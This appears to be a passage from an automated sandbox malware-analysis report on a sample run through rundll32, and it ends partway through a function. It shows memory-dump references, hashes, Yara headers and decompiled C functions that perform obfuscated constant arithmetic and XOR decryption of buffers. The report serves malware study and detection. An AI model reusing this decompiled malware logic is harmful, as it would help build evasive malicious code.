                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 7RX
                                                                                                                                  • API String ID: 0-861457431
                                                                                                                                  • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                  • Instruction ID: 6509f83acef76d70129e5a88870a449eede09681513fe689f56972b3c0071182
                                                                                                                                  • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                  • Instruction Fuzzy Hash: 86416871119702DBC798CE21C88982FBBE1FBD4788F500A1EF59652220D771CA69CF97
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E7BA6 Relevance: 1.3, Strings: 1, Instructions: 97COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002E7BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t53;
				signed int _t60;
				signed int _t67;
				unsigned int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				void* _t85;
				signed int _t92;
				void* _t98;
				intOrPtr _t99;
				signed int* _t100;
				signed int* _t101;
				signed int* _t102;

				_t100 = _a8;
				_t102 = __ecx;
				_push(_t100);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t53);
				_v12 = 0x7b3704;
				_t99 = 0;
				_v8 = 0x80915f;
				_v4 = 0;
				_v24 = 0xa71362;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x3e5;
				_v24 = _v24 ^ 0x3895df4e;
				_v28 = 0xc4b4e;
				_t76 = 0x2f;
				_v28 = _v28 * 0x14;
				_v28 = _v28 | 0x55175d82;
				_v28 = _v28 ^ 0x65144985;
				_v28 = _v28 ^ 0x30e15ded;
				_a8 = 0x3b45b7;
				_a8 = _a8 / _t76;
				_a8 = _a8 << 4;
				_t77 = 0x6c;
				_a8 = _a8 / _t77;
				_a8 = _a8 ^ 0x000cc8ea;
				_t60 =  *_t100;
				_t101 =  &(_t100[2]);
				_t92 = _t100[1] ^ _t60;
				_v20 = _t60;
				_v16 = _t92;
				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
				_t67 = E002D7FF2(_t71);
				_a8 = _t67;
				if(_t67 != 0) {
					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
					if(_t98 != 0) {
						_t74 = _v20;
						_t85 = _t67 - _t101;
						do {
							_t99 = _t99 + 1;
							 *(_t85 + _t101) =  *_t101 ^ _t74;
							_t101 =  &(_t101[1]);
						} while (_t99 < _t98);
						_t67 = _a8;
					}
					if(_t102 != 0) {
						 *_t102 = _v16;
						return _t67;
					}
				}
				return _t67;
			}
























                                                                                                                                  0x002e7bac
                                                                                                                                  0x002e7bb0
                                                                                                                                  0x002e7bb3
                                                                                                                                  0x002e7bb4
                                                                                                                                  0x002e7bb8
                                                                                                                                  0x002e7bb9
                                                                                                                                  0x002e7bba
                                                                                                                                  0x002e7bbf
                                                                                                                                  0x002e7bc7
                                                                                                                                  0x002e7bc9
                                                                                                                                  0x002e7bd3
                                                                                                                                  0x002e7bd7
                                                                                                                                  0x002e7bdf
                                                                                                                                  0x002e7be4
                                                                                                                                  0x002e7bec
                                                                                                                                  0x002e7bf4
                                                                                                                                  0x002e7c03
                                                                                                                                  0x002e7c06
                                                                                                                                  0x002e7c0a
                                                                                                                                  0x002e7c12
                                                                                                                                  0x002e7c1a
                                                                                                                                  0x002e7c22
                                                                                                                                  0x002e7c32
                                                                                                                                  0x002e7c36
                                                                                                                                  0x002e7c3f
                                                                                                                                  0x002e7c42
                                                                                                                                  0x002e7c46
                                                                                                                                  0x002e7c4e
                                                                                                                                  0x002e7c53
                                                                                                                                  0x002e7c56
                                                                                                                                  0x002e7c58
                                                                                                                                  0x002e7c5e
                                                                                                                                  0x002e7c6f
                                                                                                                                  0x002e7c83
                                                                                                                                  0x002e7c88
                                                                                                                                  0x002e7c90
                                                                                                                                  0x002e7ca6
                                                                                                                                  0x002e7cab
                                                                                                                                  0x002e7cad
                                                                                                                                  0x002e7cb3
                                                                                                                                  0x002e7cb5
                                                                                                                                  0x002e7cb9
                                                                                                                                  0x002e7cba
                                                                                                                                  0x002e7cbd
                                                                                                                                  0x002e7cc0
                                                                                                                                  0x002e7cc4
                                                                                                                                  0x002e7cc4
                                                                                                                                  0x002e7cca
                                                                                                                                  0x002e7cd0
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7cd0
                                                                                                                                  0x002e7cca
                                                                                                                                  0x002e7cda

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ]0
                                                                                                                                  • API String ID: 0-3096761382
                                                                                                                                  • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                  • Instruction ID: b65604ff83da05bbd24b1c0e25548c08fb55b801bf6a74f1ad11b53669b927f5
                                                                                                                                  • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                  • Instruction Fuzzy Hash: 0D3188716093008FD318CF2AC88594BFBE6FFC9708F508A2EF58993251DBB5E9058B56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D3C3C Relevance: 1.3, Strings: 1, Instructions: 94COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002D3C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t97;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t97);
				_v32 = 0xf161c0;
				_v32 = _v32 + 0xffff8ad4;
				_v32 = _v32 ^ 0x00fbd9a3;
				_v28 = 0xfc9039;
				_t114 = 0x1b;
				_v28 = _v28 / _t114;
				_t115 = 5;
				_v28 = _v28 * 0x6e;
				_v28 = _v28 ^ 0x040e4771;
				_v44 = 0x2ba482;
				_v44 = _v44 | 0x0543644d;
				_v44 = _v44 ^ 0x0568ae00;
				_v36 = 0xddb19;
				_t116 = 0x23;
				_v36 = _v36 / _t115;
				_v36 = _v36 ^ 0x000396ce;
				_v8 = 0xc420c0;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff6316;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 ^ 0x001ea2c5;
				_v12 = 0xb92025;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xfe32;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x088e8322;
				_v24 = 0x144a1a;
				_v24 = _v24 + 0xffffa246;
				_v24 = _v24 + 0xffff01e3;
				_v24 = _v24 ^ 0x001122d6;
				_v16 = 0x7d3361;
				_v16 = _v16 / _t116;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004840;
				_v20 = 0xb3d6e6;
				_v20 = _v20 ^ 0x61ac6c83;
				_v20 = _v20 ^ 0xeb92407c;
				_v20 = _v20 ^ 0x8a8fe9bf;
				_v40 = 0xbcf254;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xcf275652;
				_push(_v44);
				_push(_v28);
				E002DA918(_a4, _v40, _v36, _v8, E002EDCF7(_v32, 0x2d17c0, _v40), _v12,  &_v564);
				E002DA8B0(_v24, _t107, _v16);
				return E002E1F8A(_v20, _v40,  &_v564);
			}


















                                                                                                                                  0x002d3c46
                                                                                                                                  0x002d3c49
                                                                                                                                  0x002d3c4c
                                                                                                                                  0x002d3c4f
                                                                                                                                  0x002d3c50
                                                                                                                                  0x002d3c51
                                                                                                                                  0x002d3c56
                                                                                                                                  0x002d3c5f
                                                                                                                                  0x002d3c66
                                                                                                                                  0x002d3c6d
                                                                                                                                  0x002d3c79
                                                                                                                                  0x002d3c7e
                                                                                                                                  0x002d3c87
                                                                                                                                  0x002d3c8a
                                                                                                                                  0x002d3c8d
                                                                                                                                  0x002d3c94
                                                                                                                                  0x002d3c9b
                                                                                                                                  0x002d3ca2
                                                                                                                                  0x002d3ca9
                                                                                                                                  0x002d3cb5
                                                                                                                                  0x002d3cb6
                                                                                                                                  0x002d3cbb
                                                                                                                                  0x002d3cc2
                                                                                                                                  0x002d3cc9
                                                                                                                                  0x002d3ccd
                                                                                                                                  0x002d3cd8
                                                                                                                                  0x002d3cdb
                                                                                                                                  0x002d3ce2
                                                                                                                                  0x002d3ce9
                                                                                                                                  0x002d3ced
                                                                                                                                  0x002d3cf4
                                                                                                                                  0x002d3cf8
                                                                                                                                  0x002d3cff
                                                                                                                                  0x002d3d06
                                                                                                                                  0x002d3d0d
                                                                                                                                  0x002d3d14
                                                                                                                                  0x002d3d1b
                                                                                                                                  0x002d3d2c
                                                                                                                                  0x002d3d2f
                                                                                                                                  0x002d3d33
                                                                                                                                  0x002d3d37
                                                                                                                                  0x002d3d3e
                                                                                                                                  0x002d3d45
                                                                                                                                  0x002d3d4c
                                                                                                                                  0x002d3d53
                                                                                                                                  0x002d3d5a
                                                                                                                                  0x002d3d61
                                                                                                                                  0x002d3d65
                                                                                                                                  0x002d3d6c
                                                                                                                                  0x002d3d6f
                                                                                                                                  0x002d3d90
                                                                                                                                  0x002d3d9d
                                                                                                                                  0x002d3dbb

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: a3}
                                                                                                                                  • API String ID: 0-1821053108
                                                                                                                                  • Opcode ID: 3e2f485354acf59896f0e21cd0f7dea3c2c150fcf606ab418536b2e49894b9d3
                                                                                                                                  • Instruction ID: 927867dc922972847bec9976eb9565ae6375b18c40360bc76a1da1d76cde85c8
                                                                                                                                  • Opcode Fuzzy Hash: 3e2f485354acf59896f0e21cd0f7dea3c2c150fcf606ab418536b2e49894b9d3
                                                                                                                                  • Instruction Fuzzy Hash: A9410271D0020AEBCF09CFE1D94A4EEBBB2FB44314F20805AE511B6260D7B55B55DFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E8606 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002E8606(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t46;
				signed int _t50;
				unsigned int* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push(__edx);
				E002E20B9(_t46);
				 *(_t92 + 0x20) = 0xe2d3c4;
				_t79 =  &(__edx[1]);
				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
				 *(_t92 + 0x28) = 0xf8496b;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
				 *(_t92 + 0x24) = 0x2326e4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
				_t66 =  *__edx;
				_t80 =  &(_t79[1]);
				_t50 =  *_t79 ^ _t66;
				 *(_t92 + 0x2c) = _t66;
				 *(_t92 + 0x30) = _t50;
				_t30 = _t50 + 1; // 0xb
				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
				_t93 = _t92 + 0xc;
				_t63 = E002D7FF2(_t82);
				 *(_t93 + 0x1c) = _t63;
				if(_t63 != 0) {
					_t90 = 0;
					_t78 = _t63;
					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
					if(_t88 != 0) {
						_t64 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t80;
							_t80 =  &(_t80[1]);
							_t73 = _t72 ^ _t64;
							 *_t78 = _t73;
							_t78 =  &(_t78[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t78 - 3)) = _t73 >> 8;
							 *(_t78 - 2) = _t74;
							_t90 = _t90 + 1;
							 *((char*)(_t78 - 1)) = _t74 >> 8;
						} while (_t90 < _t88);
						_t63 =  *(_t93 + 0x18);
					}
					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t63;
			}



















                                                                                                                                  0x002e860c
                                                                                                                                  0x002e8610
                                                                                                                                  0x002e8614
                                                                                                                                  0x002e8618
                                                                                                                                  0x002e861a
                                                                                                                                  0x002e861f
                                                                                                                                  0x002e8627
                                                                                                                                  0x002e862a
                                                                                                                                  0x002e8632
                                                                                                                                  0x002e8637
                                                                                                                                  0x002e863f
                                                                                                                                  0x002e8647
                                                                                                                                  0x002e864f
                                                                                                                                  0x002e8659
                                                                                                                                  0x002e865d
                                                                                                                                  0x002e8665
                                                                                                                                  0x002e866d
                                                                                                                                  0x002e8675
                                                                                                                                  0x002e867a
                                                                                                                                  0x002e8682
                                                                                                                                  0x002e8686
                                                                                                                                  0x002e8689
                                                                                                                                  0x002e868b
                                                                                                                                  0x002e868f
                                                                                                                                  0x002e8693
                                                                                                                                  0x002e86a3
                                                                                                                                  0x002e86ae
                                                                                                                                  0x002e86bc
                                                                                                                                  0x002e86be
                                                                                                                                  0x002e86c6
                                                                                                                                  0x002e86ce
                                                                                                                                  0x002e86d0
                                                                                                                                  0x002e86e1
                                                                                                                                  0x002e86e6
                                                                                                                                  0x002e86e8
                                                                                                                                  0x002e86ec
                                                                                                                                  0x002e86ec
                                                                                                                                  0x002e86ee
                                                                                                                                  0x002e86f1
                                                                                                                                  0x002e86f3
                                                                                                                                  0x002e86fa
                                                                                                                                  0x002e86fd
                                                                                                                                  0x002e8700
                                                                                                                                  0x002e8703
                                                                                                                                  0x002e8709
                                                                                                                                  0x002e870a
                                                                                                                                  0x002e870d
                                                                                                                                  0x002e8711
                                                                                                                                  0x002e8711
                                                                                                                                  0x002e871a
                                                                                                                                  0x002e871a
                                                                                                                                  0x002e8726

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: &#
                                                                                                                                  • API String ID: 0-2240308938
                                                                                                                                  • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                  • Instruction ID: 92b24964c807394f3576c30edbf5a6ff4ad3828621ec6c47f8b59fb0b3177c5d
                                                                                                                                  • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                  • Instruction Fuzzy Hash: 7B319C726183418FC304CF29C88581BFBE0FF98718F454B6DE88AA7241D774EA09CB96
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EDCF7 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E002EDCF7(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t39;
				signed int _t43;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				signed int _t76;
				signed int* _t77;
				signed int* _t78;
				unsigned int _t80;
				void* _t86;
				short _t88;
				void* _t90;
				void* _t91;

				_push( *(_t90 + 0x28));
				_push( *(_t90 + 0x28));
				_push(__edx);
				E002E20B9(_t39);
				 *(_t90 + 0x24) = 0xf19f37;
				_t77 =  &(__edx[1]);
				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
				 *(_t90 + 0x20) = 0xb1a340;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
				 *(_t90 + 0x1c) = 0x9743e1;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
				_t63 =  *__edx;
				_t78 =  &(_t77[1]);
				_t43 =  *_t77 ^ _t63;
				 *(_t90 + 0x28) = _t63;
				 *(_t90 + 0x2c) = _t43;
				_t21 = _t43 + 1; // 0xf19f38
				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
				_t91 = _t90 + 8;
				_t60 = E002D7FF2(_t80 + _t80);
				 *(_t91 + 0x1c) = _t60;
				if(_t60 != 0) {
					_t88 = 0;
					_t76 = _t60;
					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
					if(_t86 != 0) {
						_t61 =  *(_t91 + 0x1c);
						do {
							_t70 =  *_t78;
							_t78 =  &(_t78[1]);
							_t71 = _t70 ^ _t61;
							 *_t76 = _t71 & 0x000000ff;
							_t76 = _t76 + 8;
							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
							_t72 = _t71 >> 0x10;
							_t88 = _t88 + 1;
							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
						} while (_t88 < _t86);
						_t60 =  *(_t91 + 0x18);
					}
					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
				}
				return _t60;
			}



















                                                                                                                                  0x002edcfd
                                                                                                                                  0x002edd01
                                                                                                                                  0x002edd05
                                                                                                                                  0x002edd07
                                                                                                                                  0x002edd0c
                                                                                                                                  0x002edd14
                                                                                                                                  0x002edd1c
                                                                                                                                  0x002edd20
                                                                                                                                  0x002edd28
                                                                                                                                  0x002edd30
                                                                                                                                  0x002edd38
                                                                                                                                  0x002edd40
                                                                                                                                  0x002edd48
                                                                                                                                  0x002edd50
                                                                                                                                  0x002edd58
                                                                                                                                  0x002edd5c
                                                                                                                                  0x002edd5f
                                                                                                                                  0x002edd61
                                                                                                                                  0x002edd65
                                                                                                                                  0x002edd69
                                                                                                                                  0x002edd79
                                                                                                                                  0x002edd84
                                                                                                                                  0x002edd93
                                                                                                                                  0x002edd95
                                                                                                                                  0x002edd9d
                                                                                                                                  0x002edda5
                                                                                                                                  0x002edda7
                                                                                                                                  0x002eddb8
                                                                                                                                  0x002eddbd
                                                                                                                                  0x002eddbf
                                                                                                                                  0x002eddc3
                                                                                                                                  0x002eddc3
                                                                                                                                  0x002eddc5
                                                                                                                                  0x002eddc8
                                                                                                                                  0x002eddcd
                                                                                                                                  0x002eddd5
                                                                                                                                  0x002edddb
                                                                                                                                  0x002edddf
                                                                                                                                  0x002edde8
                                                                                                                                  0x002edde9
                                                                                                                                  0x002eddf0
                                                                                                                                  0x002eddf4
                                                                                                                                  0x002eddf8
                                                                                                                                  0x002eddf8
                                                                                                                                  0x002ede03
                                                                                                                                  0x002ede03
                                                                                                                                  0x002ede0f

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: g|E
                                                                                                                                  • API String ID: 0-3824901942
                                                                                                                                  • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                  • Instruction ID: e26bed6c180444216799d00ef71702ed0a83f9dbe54aac114c8bf61d92f05d1a
                                                                                                                                  • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                  • Instruction Fuzzy Hash: 9531AF766183128FC314DF29C48146AF7E0FF88318F414B6EE889AB251D774EA09CF96
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D51BB Relevance: 1.3, Strings: 1, Instructions: 81COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E002D51BB() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_v28 = _v28 & 0x00000000;
				_v32 = 0x54cf7d;
				_v16 = 0x3835ff;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 * 0x17;
				_v16 = _v16 ^ 0x00095bb8;
				_t72 = 0xe98fb1d;
				_v24 = 0x583681;
				_t87 = 0x44;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000eb9f7;
				_v12 = 0x832b1f;
				_v12 = _v12 << 5;
				_v12 = _v12 | 0x242a8544;
				_v12 = _v12 ^ 0x346a2866;
				_v8 = 0x6a77bb;
				_v8 = _v8 >> 0xe;
				_t88 = 0x19;
				_v8 = _v8 / _t88;
				_v8 = _v8 ^ 0x9d9369f0;
				_v8 = _v8 ^ 0x9d908f3a;
				_v20 = 0x4802c8;
				_t89 = 0x21;
				_v20 = _v20 / _t89;
				_v20 = _v20 + 0xffffbfc3;
				_v20 = _v20 ^ 0x000df493;
				do {
					while(_t72 != 0x9835b86) {
						if(_t72 == 0xe98fb1d) {
							_push(_t72);
							_push(_t72);
							 *0x2f3e04 = E002D7FF2(0x134);
							_t72 = 0x9835b86;
							continue;
						}
						goto L5;
					}
					_t83 =  *0x2f3e04; // 0x0
					E002E0001(_v8, _t83 + 0x18, _v20);
					_t72 = 0x7dce4e4;
					L5:
				} while (_t72 != 0x7dce4e4);
				return 1;
			}















                                                                                                                                  0x002d51c1
                                                                                                                                  0x002d51c7
                                                                                                                                  0x002d51ce
                                                                                                                                  0x002d51d5
                                                                                                                                  0x002d51e2
                                                                                                                                  0x002d51ea
                                                                                                                                  0x002d51f1
                                                                                                                                  0x002d51f3
                                                                                                                                  0x002d5202
                                                                                                                                  0x002d5207
                                                                                                                                  0x002d520c
                                                                                                                                  0x002d5213
                                                                                                                                  0x002d521a
                                                                                                                                  0x002d521e
                                                                                                                                  0x002d5225
                                                                                                                                  0x002d522c
                                                                                                                                  0x002d5233
                                                                                                                                  0x002d523a
                                                                                                                                  0x002d523f
                                                                                                                                  0x002d5244
                                                                                                                                  0x002d524b
                                                                                                                                  0x002d5252
                                                                                                                                  0x002d525c
                                                                                                                                  0x002d5264
                                                                                                                                  0x002d5267
                                                                                                                                  0x002d526e
                                                                                                                                  0x002d5275
                                                                                                                                  0x002d5275
                                                                                                                                  0x002d527b
                                                                                                                                  0x002d528b
                                                                                                                                  0x002d528c
                                                                                                                                  0x002d5294
                                                                                                                                  0x002d5299
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5299
                                                                                                                                  0x00000000
                                                                                                                                  0x002d527b
                                                                                                                                  0x002d52a0
                                                                                                                                  0x002d52ac
                                                                                                                                  0x002d52b2
                                                                                                                                  0x002d52b4
                                                                                                                                  0x002d52b4
                                                                                                                                  0x002d52c1

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: f(j4
                                                                                                                                  • API String ID: 0-3086030595
                                                                                                                                  • Opcode ID: 2c61d0e7c08fbfb28a8b20ba1a7311056cd4390a4bb1edc3c7c09fd3cdb11945
                                                                                                                                  • Instruction ID: 697c5411c815d61a2bbd37efdc156cb53f59336070797f4297d5805ef8335c65
                                                                                                                                  • Opcode Fuzzy Hash: 2c61d0e7c08fbfb28a8b20ba1a7311056cd4390a4bb1edc3c7c09fd3cdb11945
                                                                                                                                  • Instruction Fuzzy Hash: B4314D71E11219ABCF04DFAAD5495EEFBB1FB44324F20809AD505AB250D3B45F59CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D2051 Relevance: 1.3, Strings: 1, Instructions: 80COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D2051(void* __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t71;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t92;
				signed int _t95;
				signed short* _t97;

				_push(_a8);
				_t97 = _a4;
				_push(_t97);
				E002E20B9(_t71);
				_v16 = 0x71ca23;
				_v12 = 0x57f692;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0xd3252c;
				_v20 = _v20 + 0x4351;
				_v20 = _v20 + 0xffff5b79;
				_v20 = _v20 ^ 0x00d2c3f6;
				_a4 = 0xbb067e;
				_t83 = 0x11;
				_a4 = _a4 / _t83;
				_a4 = _a4 >> 8;
				_a4 = _a4 ^ 0xac5d3832;
				_a4 = _a4 ^ 0xac5d3334;
				_a4 = 0xab60c2;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x910d5570;
				_a4 = _a4 >> 4;
				_a4 = _a4 ^ 0x0f1cf547;
				if( *_t97 != 0) {
					do {
						_t80 = _v20;
						_a4 = 0xbb067e;
						_a4 = _a4 / _t83;
						_a4 = _a4 >> 8;
						_a4 = _a4 ^ 0xac5d3832;
						_a4 = _a4 ^ 0xac5d3334;
						_a4 = 0xab60c2;
